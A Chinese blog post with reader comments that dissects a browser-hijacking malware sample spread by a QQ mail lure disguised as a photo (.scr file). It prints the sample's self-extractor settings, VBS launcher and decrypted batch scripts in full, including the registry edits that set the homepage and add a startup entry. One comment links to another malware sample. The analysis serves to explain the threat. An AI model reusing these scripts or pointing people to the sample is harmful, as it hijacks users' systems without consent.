『原创』刚刚下载了一颗小病毒(fwwz.net|wx00.com),跟我一起来“解剖”吧!
刚刚QQ右下角弹出一个QQ邮箱的小纸条,标题为:20美女大学生,日夜不停求包养。如下图:
这个肯定有猫腻!点进去看了下,我就知道一定是病毒了。打算把它下载下来玩玩,看我的回复:
OK,很快就下载好了,是个RAR的压缩包,解压一下,出来的是一个JPG图标的文件,文件名为“性感的我.scr”。嘿,我倒要看看你有多“性感”!
这种调虫小技早就过时了!改成exe文件然后用winrar打开,病毒文件都出来了!解压到一个文件夹,好,我们开始慢慢“解剖”。
对了,首先看一下自解压的注释,如下:
Path=C:\WINDOWS\system32
SavePath
Setup=C:\WINDOWS\system32\1.vbs
Silent=1
Overwrite=1
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=s, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://BBS.wx00.com/, “”, “互动交流”, “互动交流”
很简单的东西不用我多解释了吧?首先释放到System32,然后运行1.vbs,最后建立恶意的IE快捷方式。好,先打开1.vbs看看里面写了什么:
Set ws = CreateObject(“Wscript.Shell”)
ws.run “run.bat”,vbhide
ws.run “comman.bat”,vbhide
ws.run “2.jpg”,vbhide
运行两个批处理和一个图片。我猜这张一定是美女图片了,打开瞧瞧,是不是真的性感(啊呀,发现自己还真有点色……):
Oh, my God!Is she sexy??wo yun……
好了,继续。第一个运行的是run.bat,打开看看,惨不忍睹的一大堆!我不添代码了,直接截个图:
乱七八糟的什么东西啊?如果你关注我以前写的技术文章,你就不会问我是什么东西了。bat加密了!!一看就是用编码转换加的密。如果你关注我以前写的技术文章,你也不会问我怎么解密了。解出来就清楚了,解密之后的代码我贴一下:
cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run” /v “Explorer” /d “c:\windows\system32\Explorer.vbs” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main” /v “Default_Page_URL” /d “http://www.fwwz.net” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main” /v “Start Page” /d “http://www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOrganization” /d “www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOwner” /d “服务网络” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
start /min IEXPLORE.EXE http://www.52520qq.cn/?w
start /min IEXPLORE.EXE http://bbs.wx00.com.cn/?w
del %0
这段代码在干什么呢?
一、强制把www.fwwz.net设置为主页并添加IE快捷方式hao661.com/?6到桌面;
二、把Explorer.vbs加为启动项;
三、打开www.52520qq.cn和bbs.wx00.com.cn两个网站;
四、删除自己。
再来看一下comman.bat写了什么东西,打开一看和run.bat一样也加了密:
解密之后:
cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
ECHO 处于关闭状态。
和上面一样的东西嘛!真不知道作者在搞什么。
只剩下一个Explorer.vbs了,打开一看,唉…太让我失望了。。
Set ws = CreateObject(“Wscript.Shell”)
ws.run “comman.bat”,vbhide
一点都不好玩!!!
最后我们愚弄他一下吧!
又是一个劫持ie主页的。。。
[回复]
厉害.玩病毒都是神一样的人物.
[回复]
偶还有更性感的病毒样本,是个美女喔。。还配有声音的说~~~
[回复]
好玩吗?拿过来一起研究研究!
[回复]
没什么的。。
注入winlogon罢了
重启什么的,壁纸的xe图就是去不掉
还不断的发出声音。。。。
运行这个病毒请注意旁边有没人。。
[回复]
http://d.namipan.com/d/20c251b4c8552d3d3cbe6cbf726b362215a8d7c1304c1700
看看美女即可。。
话说长的还不错。。。
[回复]
问题是我是的IE已经被劫持了 该怎么办?
[回复]
新瓶老酒,唉……
发现现在这些宣传网站的人太像茶几了,上面布满了杯具
[回复]
搞什么啊 真是杯具
[回复]
楼主,果然强!
[回复]
Lz就是强啊,我现在还只是一个菜菜
[回复]